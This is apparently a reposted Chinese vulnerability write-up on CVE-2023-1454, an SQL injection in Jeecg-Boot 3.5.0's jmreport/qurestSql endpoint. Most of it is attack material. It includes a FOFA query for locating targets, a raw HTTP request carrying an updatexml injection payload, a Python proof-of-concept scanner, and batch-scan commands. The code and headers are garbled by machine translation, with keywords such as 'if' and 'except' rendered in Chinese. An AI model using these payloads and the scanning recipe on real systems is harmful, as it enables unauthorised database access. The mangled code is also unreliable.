一、Jeecg-Boot 简介
JeecgBoot是一个基于BPM的低代码平台。前后端分离架构支持SpringBoot 2.x、SpringCloud、Ant DesignVue、Mybatis-plus、Shiro、JWT和微服务。强大的代码生成器,一键生成前后端代码,实现低代码开发。 JeecgBoot引领了一种新的低代码开发模式OnlineCoding代码生成器手册MERGE,可以帮助Java项目解决70%的重复性任务,让开发更加专注于业务。这使您能够快速提高效率并节省研发成本,同时又不失灵活性。一套低代码功能:在线表单、在线报表、在线图表、表单设计、流程设计、报表设计、大屏设计等。
二、漏洞描述
jeecg-boot 3.5.0版本存在SQL注入漏洞。该漏洞是由jmreport/qurestSql文件中的安全问题引起的,导致通过参数apiSelectId进行SQL注入。
CVE-2023-1454
CNNVD-202303-1399
三、影响版本
jeecg-boot 版本3.5.0
四、fofa查询语句
body=”jeecg-boot”
五、漏洞复现
漏洞包
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
User-Agent: Mozilla/4.0(兼容性;MSIE 8.0;Windows NT 6.1)
Accept-Encoding: gzip、deflate
接受: */*
关闭连接:
主机: 127.0.0.1
内容类型: 应用程序/json
内容长度: 126
{\’apiSelectId\’:\’1316997232402231298\’,\’id\’:\’1\’ 或\’%1%\’ 类似(updatexml(0x3a,concat(1,(select database()))),1)) 或\’%%\’ 类似\’ \’}
数据库名称发布成功
六、POCEXP
如果url.endswith(\’/\’):
路径=\’jeecg-boot/jmreport/qurestSql\’
: 其他
路径=\’/jeecg-boot/jmreport/qurestSql\’
第:章不是url.startswith(\’http://\’)也不是url.startswith(\’https://\’)
网址=\’http://\’+网址
编码文本=URL + 路径
标题={
\’用户代理\’: \’Mozilla/4.0(兼容性;MSIE 8.0;Windows NT 6.1)\’,
\’接受编码\’: \’gzip、deflate\’,
\’接受\’: \’*/*\’,
\’连接\’: \’关闭\’,
\’内容类型\’: \’应用程序/json\’
}
有效负载={
\’apiSelectId\’: \’1316997232402231298\’,
\’id\’: \’1\’ 或\’%1%\’ 类似(updatexml(0x3a,concat(1,(select database()))),1)) 或\’%%\’ \’\’
}
# 将负载转换为JSON
json_payload=json.dumps(有效负载)
尝试:
req=request.post(encodetext, data=json_payload, headers=headers, timeout=5, proxies=self.proxies)
res=请求文本
对于req.status_code==200 和res: 的“XPATH”
self.append_to_output(f\'[+] {url} Jeecg-Boot 前端SQL 注入漏洞(CVE-2023-1454) 存在!\’, \’red\’)
#self.append_to_output(res, \’黄色\’)
使用open(\’output.txt\’, \’a\’) 作为file:
file.write(f\'[+] {url} Jeecg-Boot 前端SQL 注入漏洞(CVE-2023-1454) 存在!\’ + \’\\n\’)
文件.write(res + \’\\n\’)
: 其他
self.append_to_output(f\'[-] {url} 不存在Jeecg-Boot 前端SQL 注入漏洞(CVE-2023-1454)\’, \’green\’)
不包括超时:
self.append_to_output(f\'[!] 请求超时并跳过URL: {url}\’, \’yellow\’)
除了e:
七、批量扫描
python3 CVE-2023-1454-scan.py -u http://127.0.0.1:1111 单个URL 测试
python3 CVE-2023-1454-scan.py -f url.txt 批量检测
扫描完成后,将在当前目录中生成包含漏洞URL 的vuln.txt。
https://github.com/Sweelg/CVE-2023-1454-Jeecg-Boot-qurestSql-SQLvuln
#【漏洞复现】以上Jeecg相关内容摘自网络,仅供参考。相关信息请参见官方公告。
原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92598.html